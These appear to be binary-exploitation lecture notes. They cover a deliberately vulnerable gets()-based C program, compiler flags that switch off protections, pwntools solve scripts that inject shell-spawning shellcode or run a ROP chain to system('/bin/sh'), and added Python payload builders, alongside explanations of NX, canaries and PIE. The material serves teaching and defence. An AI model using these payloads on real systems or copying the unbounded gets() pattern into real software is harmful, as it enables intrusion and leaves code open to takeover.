Binary Exploitation Techniques and Mitigations

Apr 28, 2025

Binary Exploitation: Shellcode, Mitigations, ROP

Cool Security People of the Day (CSPoD)

The BOF Strikes Back

  • Previous Topic: Stack buffer overflow and the ret2win attack.
  • Challenges:
    • Buffer overflow on the stack via gets, which never checks the destination size.
    • Overwriting the saved return address of main's stack frame so that the ret instruction lands in win.
  • Example Code (deliberately vulnerable challenge source; gets is the bug):
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>   /* execve */
    
    /* Never called by the program itself: the goal is to return into it. */
    void win(void) {
        printf("How did you get here? I don't know whether to hire or fire you...");
        execve("/bin/sh", 0, 0);
    }
    
    int main(void) {
        char buffer[32];                /* 32 bytes, then the saved rbp, then the return address */
        setvbuf(stdout, NULL, _IONBF, 0);
        setvbuf(stderr, NULL, _IONBF, 0);
        printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
        gets(buffer);                   /* unbounded read: overflows past buffer into the saved frame */
        printf("Thanks, we received your input: %s\n", buffer);
        return 0;
    }
    

New Challenge

  • Without a win function there is nothing useful to return into, so the attacker must bring their own code. The only helper left is a single jmp rsp instruction:
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    /* Not called by the program; it exists only to plant a `jmp rsp`
     * (bytes ff e4) at a fixed address in the non-PIE binary. */
    void stuff(void) {
        asm volatile ("jmp *%%rsp;" :::);
    }
    
    int main(void) {
        char buffer[32];
        setvbuf(stdout, NULL, _IONBF, 0);
        setvbuf(stderr, NULL, _IONBF, 0);
        printf("Welcome to Paperclip Mill NLC job portal. Why should we hire you? ");
        gets(buffer);                   /* same unbounded read as before */
        printf("Thanks, we received your input: %s\n", buffer);
        return 0;
    }
    
  • Compilation Command (every flag switches off a default mitigation):
    gcc pwnme.c -o pwnme -zexecstack -fno-stack-protector -no-pie
    
    • -zexecstack: marks the stack executable, so bytes placed there by gets can run.
    • -fno-stack-protector: no stack canary, so the saved return address can be overwritten silently.
    • -no-pie: fixed load address, so the address of the jmp rsp gadget is known without a leak.
    

Shellcode

  • Goal: Inject machine code ("shellcode") into the process and redirect execution to it, typically to spawn a shell.
  • Gadgets:
    • Short instruction sequences that already exist in the binary's executable memory and are reused after the overflow to redirect control.
    • Use ropper (or pwntools) to search the binary for them.
    • The shellcode needs memory that is both writable (to place it) and executable (to run it); the -zexecstack stack provides exactly that here.
    • Returning into a jmp rsp gadget solves the "where is my shellcode" problem: after ret pops the gadget address, rsp points at the bytes immediately following it on the stack, so the stack address itself never has to be known.

Shellcode Implementation

  • Tools: pwntools (shellcraft generates shellcode, asm assembles it), the shell-storm.org shellcode database, and other one-off tools.
  • Example Solve Script:
    from pwn import *
    context.arch = "amd64"                 # shellcraft/asm target
    p = process("./pwnme")
    gdb.attach(p)                          # optional: break on the crash to verify the layout
    # 32-byte buffer + 8-byte saved rbp = 40 bytes of padding,
    # then the address of the `jmp rsp` gadget in stuff() (specific to this build),
    # then the shellcode, which is what rsp points at once ret has popped the gadget address.
    payload = b"Z" * 40 + p64(0x40117e) + asm(shellcraft.sh())
    p.sendline(payload)                    # gets() stops at '\n', so the payload must not contain 0x0a
    p.interactive()
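
The two details the solve script hides, locating the jmp rsp gadget and checking that the payload survives gets, as an added example that is not part of the lecture notes. It uses only the standard library so it runs without pwntools or the challenge binary; the TEXT blob is a hand-assembled stand-in for the .text bytes of ./pwnme and TEXT_BASE an assumed load address, so the gadget address it finds is not the lecture's 0x40117e.

```python
import struct

# Constructed stand-in for the executable bytes of the challenge binary.
# In a real solve these come from the binary's .text section (for example
# pwntools: ELF("./pwnme").section(".text")); here a few x86-64
# instructions are hand-assembled so the example runs offline.
TEXT_BASE = 0x401000                   # assumed address of the blob below
TEXT = (
    b"\x55"                            # push rbp
    b"\x48\x89\xe5"                    # mov rbp, rsp
    b"\xff\xe4"                        # jmp rsp   <- the gadget we want
    b"\x5d"                            # pop rbp
    b"\xc3"                            # ret
)

JMP_RSP = b"\xff\xe4"                  # encoding of `jmp rsp` (pwntools: asm("jmp rsp"))


def find_gadget(code: bytes, base: int, needle: bytes) -> list:
    """Return every address in `code` where `needle` occurs.

    x86 instructions are variable length, so a match need not sit on an
    instruction boundary: the CPU decodes from whatever address it is
    sent to, which is exactly what gadget hunting relies on.  Only search
    memory that is actually mapped executable.
    """
    hits, start = [], 0
    while (i := code.find(needle, start)) != -1:
        hits.append(base + i)
        start = i + 1
    return hits


def gets_safe(payload: bytes) -> bool:
    """gets() stops reading at the first '\\n' (0x0a), so a payload that
    contains that byte anywhere is silently truncated on delivery."""
    return b"\n" not in payload


def build_jmp_rsp_payload(buf_size: int, gadget: int, shellcode: bytes) -> bytes:
    """Lay out the stack overflow for a gets()-fed buffer:

        [buf_size bytes][saved rbp][ret -> jmp rsp][shellcode]

    After main's `ret` pops the gadget address, rsp points at the next
    qword, i.e. the first shellcode byte, so `jmp rsp` runs the shellcode
    without anyone knowing the stack address.
    """
    padding = b"Z" * (buf_size + 8)            # buffer + saved rbp
    payload = padding + struct.pack("<Q", gadget) + shellcode
    if not gets_safe(payload):
        raise ValueError("payload contains 0x0a; gets() would stop there")
    return payload


if __name__ == "__main__":
    gadget = find_gadget(TEXT, TEXT_BASE, JMP_RSP)[0]
    # Placeholder shellcode (NOPs) so the layout can be inspected; a real
    # solve substitutes asm(shellcraft.sh()) or a shell-storm payload.
    print(build_jmp_rsp_payload(32, gadget, b"\x90" * 4).hex())
```

For the lecture's binary the buffer is 32 bytes, which is where the 40-byte padding in the solve script comes from; the gadget address is whatever find_gadget reports for the real .text, and the 0x0a check is why a shellcode containing a newline byte has to be re-encoded before it is sent through gets.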
    

Mitigations

  • Challenges with gets: it has no safe use, because the caller cannot tell it the buffer size; it was removed from the C standard in C11 yet is still common in old C code. Compilers and linkers warn about it ("the gets function is dangerous").
  • Compiler Warnings and Mitigations:
    • The challenge was only exploitable because -zexecstack, -fno-stack-protector and -no-pie switched off mitigations that gcc and ld apply by default (non-executable stack, stack canaries, position-independent code).
    • NX bit / W^X: each memory page is either writable or executable, never both. Shellcode written to the stack by gets therefore cannot run; execution faults on the first fetched byte, which is what forces attackers toward reusing existing code (ROP).
  • Real World Examples: memory-corruption bugs in the sudo utility and in D-Link router firmware.

ROP (Return Oriented Programming)

  • Concept:
    • Chain short instruction sequences ("gadgets") that already exist in executable memory, each ending in ret.
    • Each gadget's ret pops the next address from the attacker-controlled stack, so the overflow data itself sequences the gadgets (jmp-ending gadgets work similarly). No new code is injected, which is why NX alone does not stop it.
  • Calling Conventions: on x86-64 System V the first integer arguments travel in rdi, rsi, rdx, rcx, r8, r9, so a pop rdi; ret gadget followed by a value on the stack is enough to pass one argument such as the address of "/bin/sh".
  • GOT (Global Offset Table) and PLT (Procedure Linkage Table): PLT stubs jump through GOT slots that the dynamic linker fills with the real libc addresses. When the binary already imports system, returning into system@plt calls it without knowing where libc was loaded.
  • Stack alignment: the ABI guarantees that rsp + 8 is 16-byte aligned on function entry, and glibc's system relies on it (movaps on stack memory, which faults when misaligned). A chain of pop rdi, "/bin/sh", system@plt arrives off by 8, so a lone ret gadget is prepended to consume one extra qword.
  • Example ROP Solve Script:
    from pwn import *
    context.arch = "amd64"
    p = process("./pwnme2")
    # Addresses are specific to this non-PIE build; recover them with ropper / ELF().
    pop_rdi = 0x401293                             # pop rdi ; ret
    binsh = 0x404060                               # "/bin/sh" string inside the binary
    system_plt = 0x000000401070                    # system@plt
    alignment_ret = 0x000000000040122d             # lone ret, fixes 16-byte stack alignment
    # 40 bytes of padding (32-byte buffer + saved rbp), then:
    #   ret -> pop rdi ; ret  (rdi = binsh)  -> system@plt
    payload = b"F" * 40 + p64(alignment_ret) + p64(pop_rdi) + p64(binsh) + p64(system_plt)
    p.sendline(payload)
    p.interactive()
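
A pure-Python ROP chain builder, added here as a worked example that is not part of the lecture's solve script. It reproduces the pwnme2 payload byte for byte and makes the alignment rule explicit: it counts how many qwords the chain consumes before the target function starts and prepends the lone ret only when that count would leave rsp off by 8. The gadget addresses are the ones quoted in the notes and are valid only for that build; the pop_rsi/pop_rdx lookups are a hypothetical extension for passing more arguments and are not gadgets the notes report.

```python
import struct

# Addresses copied from the lecture's pwnme2 solve script; they are only
# valid for that exact non-PIE build.  Re-derive them with ropper or
# pwntools' ROP class for any other binary.
GADGETS = {
    "pop_rdi": 0x401293,   # pop rdi ; ret
    "ret":     0x40122d,   # ret      (alignment gadget)
}
BINSH_STR  = 0x404060      # "/bin/sh" string inside the binary
SYSTEM_PLT = 0x401070      # system@plt
PADDING    = b"F" * 40     # 32-byte buffer + saved rbp


def p64(value: int) -> bytes:
    """Pack a qword little-endian (same as pwntools' p64 on amd64)."""
    return struct.pack("<Q", value)


def entry_rsp_mod16(chain) -> int:
    """rsp mod 16 at the moment control reaches the last address in `chain`.

    `chain` is the list of qwords that overwrite main's return address and
    the stack above it.  With gcc's usual prologue, main's `ret` pops from
    an address that is 8 mod 16 (System V keeps rsp 16-byte aligned before
    a call, and the call pushes the return address 8 bytes below that).
    Every qword in the chain is popped exactly once, either by a gadget's
    `pop` or by a `ret`, so when the final target starts executing, rsp
    points just past the chain.  The ABI expects rsp == 8 mod 16 there.
    """
    return (8 + 8 * len(chain)) % 16


def call_chain(func: int, args, gadgets) -> list:
    """Qwords that load up to three integer arguments through pop gadgets
    in System V order (rdi, rsi, rdx) and then transfer to `func`.
    Raises KeyError if a required pop gadget is not in `gadgets`."""
    words = []
    for reg, val in zip(("rdi", "rsi", "rdx"), args):
        words += [gadgets[f"pop_{reg}"], val]
    words.append(func)
    return words


def build_rop_payload(func: int, args, gadgets, padding: bytes = PADDING) -> bytes:
    """Padding followed by the chain, with a lone `ret` prepended when the
    chain would otherwise reach `func` misaligned (glibc's system() does a
    movaps on the stack and faults if rsp is off by 8)."""
    chain = call_chain(func, args, gadgets)
    if entry_rsp_mod16(chain) != 8:
        chain.insert(0, gadgets["ret"])   # consumes one qword, fixes the parity
    assert entry_rsp_mod16(chain) == 8
    # As with any gets()-delivered payload, none of these bytes may be 0x0a.
    return padding + b"".join(p64(w) for w in chain)


if __name__ == "__main__":
    print(build_rop_payload(SYSTEM_PLT, [BINSH_STR], GADGETS).hex())
```

Running it prints exactly the bytes the pwntools script sends: 40 bytes of padding, then ret, pop rdi; ret, the "/bin/sh" address and system@plt. Dropping the ret makes entry_rsp_mod16 return 0 instead of 8, which is the crash-inside-system symptom that the alignment gadget fixes.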
    

Summary

  • Topics Covered: Shellcode injection via a jmp rsp gadget, the mitigations (NX/W^X, stack canaries, PIE) that the challenge disabled, and ROP with a system@plt chain including stack alignment.
  • Next Topics: Information leaks, ASLR, and further binary exploitation techniques.